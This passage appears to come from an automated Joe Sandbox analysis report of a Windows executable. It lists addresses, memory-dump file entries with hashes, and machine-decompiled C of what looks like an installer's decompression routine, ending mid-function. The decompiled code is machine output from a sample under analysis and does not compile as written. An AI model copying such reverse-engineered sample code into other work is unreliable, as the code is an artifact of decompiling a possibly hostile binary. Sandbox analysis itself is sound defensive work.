                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004074c7
                                                                                    0x00407490

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 706 407395-407399 707 4073bb-4073c8 706->707 708 40739b-40749d 706->708 710 4073cb-4073e0 707->710 718 4074c7-4074cb 708->718 711 4073e2-4073f8 710->711 712 4073fa-407410 710->712 714 407413-40741a 711->714 712->714 716 407441 714->716 717 40741c-407420 714->717 723 407447-40744d 716->723 721 407426-40743e 717->721 722 4075cf-4075d9 717->722 719 40752b-40753e 718->719 720 4074cd-4074ee 718->720 719->723 724 4074f0-407505 720->724 725 407507-40751a 720->725 721->716 726 4075e5-4075f8 722->726 728 406bf2 723->728 729 4075fa 723->729 730 40751d-407524 724->730 725->730 731 4075fd-407601 726->731 732 406bf9-406bfd 728->732 733 406d39-406d5a 728->733 734 406c9e-406ca2 728->734 735 406d0e-406d12 728->735 729->731 736 4074c4 730->736 737 407526 730->737 732->726 738 406c03-406c10 732->738 733->710 742 406ca8-406cc1 734->742 743 40754e-407558 734->743 739 406d18-406d2c 735->739 740 40755d-407567 735->740 736->718 744 4074a9-4074c1 737->744 745 4075db 737->745 738->729 746 406c16-406c5c 738->746 747 406d2f-406d37 739->747 740->726 748 406cc4-406cc8 742->748 743->726 744->736 745->726 749 406c84-406c86 746->749 750 406c5e-406c62 746->750 747->733 747->735 748->734 751 406cca-406cd0 748->751 756 406c94-406c9c 749->756 757 406c88-406c92 749->757 754 406c64-406c67 GlobalFree 750->754 755 406c6d-406c7b GlobalAlloc 750->755 752 406cd2-406cd9 751->752 753 406cfa-406d0c 751->753 758 406ce4-406cf4 GlobalAlloc 752->758 759 406cdb-406cde GlobalFree 752->759 753->747 754->755 755->729 760 406c81 755->760 756->748 757->756 757->757 758->729 758->753 759->758 760->749
                                                                                    C-Code - Quality: 98%
                                                                                    			E00407395() {
                                                                                    				void _t533;
                                                                                    				signed int _t534;
                                                                                    				signed int _t535;
                                                                                    				signed int* _t605;
                                                                                    				void* _t612;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					if( *(_t612 - 0x40) != 0) {
                                                                                    						 *(_t612 - 0x84) = 0x13;
                                                                                    						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                    						goto L132;
                                                                                    					} else {
                                                                                    						__eax =  *(__ebp - 0x4c);
                                                                                    						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                    						__ecx =  *(__ebp - 0x58);
                                                                                    						__eax =  *(__ebp - 0x4c) << 4;
                                                                                    						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                    						L130:
                                                                                    						 *(__ebp - 0x58) = __eax;
                                                                                    						 *(__ebp - 0x40) = 3;
                                                                                    						L144:
                                                                                    						 *(__ebp - 0x7c) = 0x14;
                                                                                    						L145:
                                                                                    						__eax =  *(__ebp - 0x40);
                                                                                    						 *(__ebp - 0x50) = 1;
                                                                                    						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                    						L149:
                                                                                    						if( *(__ebp - 0x48) <= 0) {
                                                                                    							__ecx =  *(__ebp - 0x40);
                                                                                    							__ebx =  *(__ebp - 0x50);
                                                                                    							0 = 1;
                                                                                    							__eax = 1 << __cl;
                                                                                    							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                    							__eax =  *(__ebp - 0x7c);
                                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                                    							while(1) {
                                                                                    								L140:
                                                                                    								 *(_t612 - 0x88) = _t533;
                                                                                    								while(1) {
                                                                                    									L1:
                                                                                    									_t534 =  *(_t612 - 0x88);
                                                                                    									if(_t534 > 0x1c) {
                                                                                    										break;
                                                                                    									}
                                                                                    									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                    										case 0:
                                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                    											_t534 =  *( *(_t612 - 0x70));
                                                                                    											if(_t534 > 0xe1) {
                                                                                    												goto L171;
                                                                                    											}
                                                                                    											_t538 = _t534 & 0x000000ff;
                                                                                    											_push(0x2d);
                                                                                    											asm("cdq");
                                                                                    											_pop(_t569);
                                                                                    											_push(9);
                                                                                    											_pop(_t570);
                                                                                    											_t608 = _t538 / _t569;
                                                                                    											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                    											asm("cdq");
                                                                                    											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                    											 *(_t612 - 0x3c) = _t603;
                                                                                    											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                    											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                    											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                    											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                    												L10:
                                                                                    												if(_t611 == 0) {
                                                                                    													L12:
                                                                                    													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                    													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                    													goto L15;
                                                                                    												} else {
                                                                                    													goto L11;
                                                                                    												}
                                                                                    												do {
                                                                                    													L11:
                                                                                    													_t611 = _t611 - 1;
                                                                                    													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                    												} while (_t611 != 0);
                                                                                    												goto L12;
                                                                                    											}
                                                                                    											if( *(_t612 - 4) != 0) {
                                                                                    												GlobalFree( *(_t612 - 4));
                                                                                    											}
                                                                                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    											 *(_t612 - 4) = _t534;
                                                                                    											if(_t534 == 0) {
                                                                                    												goto L171;
                                                                                    											} else {
                                                                                    												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                    												goto L10;
                                                                                    											}
                                                                                    										case 1:
                                                                                    											L13:
                                                                                    											__eflags =  *(_t612 - 0x6c);
                                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                                    												 *(_t612 - 0x88) = 1;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                    											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                    											_t45 = _t612 - 0x48;
                                                                                    											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                    											__eflags =  *_t45;
                                                                                    											L15:
                                                                                    											if( *(_t612 - 0x48) < 4) {
                                                                                    												goto L13;
                                                                                    											}
                                                                                    											_t546 =  *(_t612 - 0x40);
                                                                                    											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                    												L20:
                                                                                    												 *(_t612 - 0x48) = 5;
                                                                                    												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                    												goto L23;
                                                                                    											}
                                                                                    											 *(_t612 - 0x74) = _t546;
                                                                                    											if( *(_t612 - 8) != 0) {
                                                                                    												GlobalFree( *(_t612 - 8));
                                                                                    											}
                                                                                    											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                    											 *(_t612 - 8) = _t534;
                                                                                    											if(_t534 == 0) {
                                                                                    												goto L171;
                                                                                    											} else {
                                                                                    												goto L20;
                                                                                    											}
                                                                                    										case 2:
                                                                                    											L24:
                                                                                    											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                    											 *(_t612 - 0x84) = 6;
                                                                                    											 *(_t612 - 0x4c) = _t553;
                                                                                    											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                    											goto L132;
                                                                                    										case 3:
                                                                                    											L21:
                                                                                    											__eflags =  *(_t612 - 0x6c);
                                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                                    												 *(_t612 - 0x88) = 3;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                    											_t67 = _t612 - 0x70;
                                                                                    											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                    											__eflags =  *_t67;
                                                                                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                    											L23:
                                                                                    											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                    											if( *(_t612 - 0x48) != 0) {
                                                                                    												goto L21;
                                                                                    											}
                                                                                    											goto L24;
                                                                                    										case 4:
                                                                                    											L133:
                                                                                    											_t531 =  *_t605;
                                                                                    											_t588 = _t531 & 0x0000ffff;
                                                                                    											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                    											if( *(_t612 - 0xc) >= _t564) {
                                                                                    												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                    												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                    												 *(_t612 - 0x40) = 1;
                                                                                    												_t532 = _t531 - (_t531 >> 5);
                                                                                    												__eflags = _t532;
                                                                                    												 *_t605 = _t532;
                                                                                    											} else {
                                                                                    												 *(_t612 - 0x10) = _t564;
                                                                                    												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                    												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                    											}
                                                                                    											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                    												goto L139;
                                                                                    											} else {
                                                                                    												goto L137;
                                                                                    											}
                                                                                    										case 5:
                                                                                    											L137:
                                                                                    											if( *(_t612 - 0x6c) == 0) {
                                                                                    												 *(_t612 - 0x88) = 5;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                    											L139:
                                                                                    											_t533 =  *(_t612 - 0x84);
                                                                                    											goto L140;
                                                                                    										case 6:
                                                                                    											__edx = 0;
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) = 1;
                                                                                    												 *(__ebp - 0x84) = 7;
                                                                                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                    												goto L132;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    											__esi =  *(__ebp - 0x60);
                                                                                    											__cl = 8;
                                                                                    											__cl = 8 -  *(__ebp - 0x3c);
                                                                                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    											__ecx =  *(__ebp - 0x3c);
                                                                                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    											__ecx =  *(__ebp - 4);
                                                                                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    											__eflags =  *(__ebp - 0x38) - 4;
                                                                                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    											if( *(__ebp - 0x38) >= 4) {
                                                                                    												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                    												if( *(__ebp - 0x38) >= 0xa) {
                                                                                    													_t98 = __ebp - 0x38;
                                                                                    													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                    													__eflags =  *_t98;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x38) = 0;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                    											if( *(__ebp - 0x34) == __edx) {
                                                                                    												__ebx = 0;
                                                                                    												__ebx = 1;
                                                                                    												goto L61;
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 8);
                                                                                    												__ebx = 0;
                                                                                    												__ebx = 1;
                                                                                    												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    												goto L41;
                                                                                    											}
                                                                                    										case 7:
                                                                                    											__eflags =  *(__ebp - 0x40) - 1;
                                                                                    											if( *(__ebp - 0x40) != 1) {
                                                                                    												__eax =  *(__ebp - 0x24);
                                                                                    												 *(__ebp - 0x80) = 0x16;
                                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    												__eax =  *(__ebp - 0x28);
                                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    												__eax = 0;
                                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    												__al = __al & 0x000000fd;
                                                                                    												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__eax =  *(__ebp - 4) + 0x664;
                                                                                    												__eflags = __eax;
                                                                                    												 *(__ebp - 0x58) = __eax;
                                                                                    												goto L69;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 4);
                                                                                    											__ecx =  *(__ebp - 0x38);
                                                                                    											 *(__ebp - 0x84) = 8;
                                                                                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                    											goto L132;
                                                                                    										case 8:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x84) = 0xa;
                                                                                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x38);
                                                                                    												__ecx =  *(__ebp - 4);
                                                                                    												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                    												 *(__ebp - 0x84) = 9;
                                                                                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                    											}
                                                                                    											goto L132;
                                                                                    										case 9:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												goto L90;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x60);
                                                                                    											if( *(__ebp - 0x60) == 0) {
                                                                                    												goto L171;
                                                                                    											}
                                                                                    											__eax = 0;
                                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    											__eflags = _t259;
                                                                                    											0 | _t259 = _t259 + _t259 + 9;
                                                                                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                    											goto L76;
                                                                                    										case 0xa:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x84) = 0xb;
                                                                                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                    												goto L132;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x28);
                                                                                    											goto L89;
                                                                                    										case 0xb:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__ecx =  *(__ebp - 0x24);
                                                                                    												__eax =  *(__ebp - 0x20);
                                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x24);
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x28);
                                                                                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    											L89:
                                                                                    											__ecx =  *(__ebp - 0x2c);
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    											L90:
                                                                                    											__eax =  *(__ebp - 4);
                                                                                    											 *(__ebp - 0x80) = 0x15;
                                                                                    											__eax =  *(__ebp - 4) + 0xa68;
                                                                                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                    											goto L69;
                                                                                    										case 0xc:
                                                                                    											L100:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xc;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t335 = __ebp - 0x70;
                                                                                    											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t335;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											goto L102;
                                                                                    										case 0xd:
                                                                                    											L37:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xd;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t122 = __ebp - 0x70;
                                                                                    											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t122;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L39:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    												goto L48;
                                                                                    											}
                                                                                    											__eflags = __ebx - 0x100;
                                                                                    											if(__ebx >= 0x100) {
                                                                                    												goto L54;
                                                                                    											}
                                                                                    											L41:
                                                                                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    											 *(__ebp - 0x48) = __eax;
                                                                                    											__eax = __eax + 1;
                                                                                    											__eax = __eax << 8;
                                                                                    											__eax = __eax + __ebx;
                                                                                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__ax =  *__esi;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__edx = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												 *(__ebp - 0x40) = 1;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eflags = __eax;
                                                                                    												__ebx = __ebx + __ebx + 1;
                                                                                    												 *__esi = __ax;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edx;
                                                                                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L39;
                                                                                    											} else {
                                                                                    												goto L37;
                                                                                    											}
                                                                                    										case 0xe:
                                                                                    											L46:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                                    												goto L170;
